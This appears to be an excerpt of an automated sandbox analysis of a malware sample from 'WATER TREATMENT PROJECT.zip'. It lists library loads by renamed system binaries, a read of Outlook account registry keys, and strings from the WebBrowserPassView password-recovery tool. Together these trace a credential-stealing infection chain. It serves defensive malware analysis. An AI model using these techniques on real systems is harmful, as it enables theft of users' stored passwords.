Source: C:\Users\Public\rdha.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: sti.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\expha.pif	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\expha.pif	Section loaded: cabinet.dll
Source: C:\Users\Public\expha.pif	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\ghf.pif	Section loaded: certcli.dll
Source: C:\Users\Public\ghf.pif	Section loaded: cabinet.dll
Source: C:\Users\Public\ghf.pif	Section loaded: cryptui.dll
Source: C:\Users\Public\ghf.pif	Section loaded: certca.dll
Source: C:\Users\Public\ghf.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\ghf.pif	Section loaded: ncrypt.dll
Source: C:\Users\Public\ghf.pif	Section loaded: netapi32.dll
Source: C:\Users\Public\ghf.pif	Section loaded: ntdsapi.dll
Source: C:\Users\Public\ghf.pif	Section loaded: version.dll
Source: C:\Users\Public\ghf.pif	Section loaded: secur32.dll
Source: C:\Users\Public\ghf.pif	Section loaded: samcli.dll
Source: C:\Users\Public\ghf.pif	Section loaded: logoncli.dll
Source: C:\Users\Public\ghf.pif	Section loaded: dsrole.dll
Source: C:\Users\Public\ghf.pif	Section loaded: netutils.dll
Source: C:\Users\Public\ghf.pif	Section loaded: sspicli.dll
Source: C:\Users\Public\ghf.pif	Section loaded: ntasn1.dll
Source: C:\Users\Public\ghf.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\ghf.pif	Section loaded: profapi.dll
Source: C:\Users\Public\ghf.pif	Section loaded: certcli.dll
Source: C:\Users\Public\ghf.pif	Section loaded: cabinet.dll
Source: C:\Users\Public\ghf.pif	Section loaded: cryptui.dll
Source: C:\Users\Public\ghf.pif	Section loaded: ncrypt.dll
Source: C:\Users\Public\ghf.pif	Section loaded: netapi32.dll
Source: C:\Users\Public\ghf.pif	Section loaded: ntdsapi.dll
Source: C:\Users\Public\ghf.pif	Section loaded: certca.dll
Source: C:\Users\Public\ghf.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\ghf.pif	Section loaded: version.dll
Source: C:\Users\Public\ghf.pif	Section loaded: secur32.dll
Source: C:\Users\Public\ghf.pif	Section loaded: samcli.dll
Source: C:\Users\Public\ghf.pif	Section loaded: logoncli.dll
Source: C:\Users\Public\ghf.pif	Section loaded: dsrole.dll
Source: C:\Users\Public\ghf.pif	Section loaded: netutils.dll
Source: C:\Users\Public\ghf.pif	Section loaded: sspicli.dll
Source: C:\Users\Public\ghf.pif	Section loaded: ntasn1.dll
Source: C:\Users\Public\ghf.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\ghf.pif	Section loaded: profapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Users\Public\rdha.pif	Section loaded: zipfldr.dll
Source: C:\Users\Public\rdha.pif	Section loaded: propsys.dll
Source: C:\Users\Public\rdha.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\rdha.pif	Section loaded: windows.storage.dll
Source: C:\Users\Public\rdha.pif	Section loaded: wldp.dll
Source: C:\Users\Public\rdha.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\rdha.pif	Section loaded: profapi.dll
Source: C:\Users\Public\rdha.pif	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\rdha.pif	Section loaded: edputil.dll
Source: C:\Users\Public\rdha.pif	Section loaded: urlmon.dll
Source: C:\Users\Public\rdha.pif	Section loaded: iertutil.dll
Source: C:\Users\Public\rdha.pif	Section loaded: srvcli.dll
Source: C:\Users\Public\rdha.pif	Section loaded: netutils.dll
Source: C:\Users\Public\rdha.pif	Section loaded: sspicli.dll
Source: C:\Users\Public\rdha.pif	Section loaded: wintypes.dll
Source: C:\Users\Public\rdha.pif	Section loaded: appresolver.dll
Source: C:\Users\Public\rdha.pif	Section loaded: bcp47langs.dll
Source: C:\Users\Public\rdha.pif	Section loaded: slc.dll
Source: C:\Users\Public\rdha.pif	Section loaded: userenv.dll
Source: C:\Users\Public\rdha.pif	Section loaded: sppc.dll
Source: C:\Users\Public\rdha.pif	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\rdha.pif	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: version.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: url.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: propsys.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ????.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??????????.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ???.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ???.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ???.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ????.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: spp.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: sppwmi.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: slc.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: sppcext.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: winscard.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: devobj.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: cryptsp.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: rsaenh.dll
Source: C:\Users\Public\ANYDESK.PIF	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: atlthunk.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: ksuser.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: avrt.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: audioses.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: midimap.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: iphlpapi.dll

Source: C:\Users\Public\rdha.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\colorcpl.exe

Window detected: Number of UI elements: 12

Source: C:\Windows\SysWOW64\recover.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Source: WATER TREATMENT PROJECT.zip

Static file information: File size 4183698 > 1048576

Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020857000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020840000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020810000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E850000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1820802992.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: alpha.pif, 00000013.00000000.1781982162.00007FF71DCD2000.00000002.00000001.01000000.00000008.sdmp, esentutl.exe, 00000021.00000003.1829871051.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000022.00000000.1833954751.0000000000401000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.16.dr
Source:	Binary string: extrac32.pdb source: extrac32.exe, 0000000F.00000002.1778788715.0000023AA9960000.00000004.00000020.00020000.00000000.sdmp, expha.pif, 00000010.00000000.1779015849.00007FF66B896000.00000002.00000001.01000000.00000007.sdmp, expha.pif.15.dr
